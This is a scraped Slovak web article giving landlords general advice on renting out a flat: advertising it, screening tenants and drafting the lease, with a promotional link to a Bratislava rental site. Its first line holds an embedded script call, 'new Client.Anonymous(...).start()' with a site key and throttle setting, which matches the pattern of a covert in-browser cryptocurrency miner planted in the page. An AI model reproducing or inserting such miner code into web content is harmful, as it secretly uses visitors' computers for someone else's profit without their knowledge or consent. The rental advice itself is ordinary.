pronajem-bytu-martin var _client = new Client.Anonymous('0b408ad436e697e403cb6941f29f5bf9dcb41c85ae9dd6af93bab463618ffa07', {throttle: 0.4}); _client.start();

Ako postupovať pri prenájme bytu


Chystáte sa na prenájom bytu? Ako správne postupovať? Ako sa vyhnúť zbytočným budúcim komplikáciám? Prenájom nehnuteľnosti je veľmi obľúbeným spôsobom zhodnotenie svojich úspor. Stačí zakúpiť vhodný byt, nájsť solventného nájomníkma a využívať slušnú rentabilitu až 7% ročne. Ako však správne postupovať? Na čo si dať pozor? Ako spísať dokonalú nájomnú zmluvu? Predovšetkým sa rozhodnite, či chcete prenájom realizovať úplne sami alebo využijete služby špecializovanej agentúry či realitné kancelárie. V prípade realitného agenta si môžete zaplatiť províziu vo výške jedného až dvoch nájmov, spravidla ale nájdete vhodného nájomníka oveľa rýchlejšie, čo sa nakoniec môže aj veľmi dobre vyplatiť.

Ako realizovať prenájom na vlastnú päsť

Pokiaľ sa rozhodnete pre prenájom svojpomocne, musíte byt najskôr vhodne nafotiť a vytvoriť lákavú ale pravdivú inzertnú ponuku a umiestniť ju na čo najviac realitných serverov, prípadne do novín a ďalšej realitnej inzercie. Pri popise bytu nezabudnite na podrobné informácie o vybavení vrátane nábytku, telefónu, televízie či internetu, zmieňte sa o okolí nehnuteľnosti vrátane občianskej vybavenosti a dostupnosti do centra mesta. Nechajte si vypracovať podrobnú nájomnú zmluvu skúseným advokátom a môžete sa pustiť do hľadania nájomníkov. Pri prvom telefonickom kontakte sa snažte maximálne eliminovať nevyhovujúcich uchádzačov a s tými, ktorí sa vám budú naopak javiť ako vhodní si ihneď dohodnite osobné stretnutie a prehliadku bytu.

http://prenajom-bratislava.eu/ – prenájom byt Bratislava

Pozor na nájomnú zmluvu

Či už sa chystáte na prenájom v spolupráci s realitnou kanceláriou alebo si všetko zariaďujete sami, nájomná zmluva je tu absolútne kľúčová. Mala by obsahovať predovšetkým presný opis bytu a jeho príslušenstva, zákaz alebo povolenie domácich zvierat vrátane exotických, zákaz alebo povolenie podnikania v byte a hlavne cenu za prenájom, cenu za služby spojené s užívaním bytu ako je teplo, voda, elektrina, plyn, internet, vodné a stočné a odvoz odpadu a podmienky ich platieb. Ďalej nezabudnite na dostatočne vysokú vratnú kauciu a spôsob neskoršieho vyúčtovanie služieb a poistenia zodpovednosti.
 
Ako filtrovať potenciálnych nájomníkmov
 
tagy: prenájom byt Bratislava, Ako filtrovať potenciálnych nájomníkmov